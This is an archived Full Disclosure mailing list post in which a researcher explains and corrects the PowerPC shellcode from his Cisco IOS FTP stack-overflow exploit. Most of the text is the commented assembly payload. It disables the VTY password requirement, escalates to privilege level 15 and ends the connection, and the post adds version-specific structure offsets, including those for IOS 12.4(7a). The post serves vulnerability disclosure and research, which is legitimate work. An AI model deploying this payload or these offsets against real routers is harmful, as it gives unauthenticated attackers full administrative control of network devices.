Home page logo

fulldisclosure logo Full Disclosure mailing list archives

Cisco IOS shellcode explanation - additional
From: "Andy Davis" <iosftpexploit () googlemail com>
Date: Wed, 30 Jul 2008 18:51:12 +0100

Anyone spot the typo? It's also in a comment in the exploit source,
but doesn't affect how the code works:

"addi    7,7,233" should read "addi    7,7,2330"

The first offset (requirement to authenticate) is at 0x174 and the
second (privilege level) is at 0xde4

Its worth noting that at some stage around IOS 12.4 this structure
changed slightly and therfore if you were planning on exploiting
12.4(7a) which is also vulnerable to the FTP stack overflow, the
offsets are 0x17c and 0xdec



On Wed, Jul 30, 2008 at 10:03 AM, Andy Davis
<iosftpexploit () googlemail com> wrote:

Lots of people have been asking for details about the slightly
unorthodox shellcode I used within the IOS FTP exploit, so here goes:

.equ vty_info, 0x8182da60   //contains a pointer to the VTY info structure
.equ terminate, 0x80e4086c

lis     4,vty_info () ha
la      4,vty_info () l(4)
xor     8,8,8            //Clear r8
lwzx    7,4,8            //Get pointer to VTY info structure
stw     8,372(7)         //Write zero to first offset to remove
                        //the requirement to enter a password
subi    8,8,1            //Set r8 to be 0xffffffff
addi    7,7,233          //Add second offset in two steps to
                        //avoid nulls in the shellcode
stw     8,1226(7)        //Write 0xffffffff to second offset to
                        //priv escalate to level 15
                        //(technically this should be 0xff100000
                        //but 0xffffffff works and is more efficient)
mr      3,8              //Use 0xffffffff as a parameter
                        //to pass to terminate()
lis     4,terminate () ha
la      4,terminate () l(4)
mtctr   4
bctr                     //terminate "this process"
                        //(current connection to the FTP server)



Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

  By Date           By Thread  

Current thread:
  • Cisco IOS shellcode explanation - additional Andy Davis (Jul 30)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]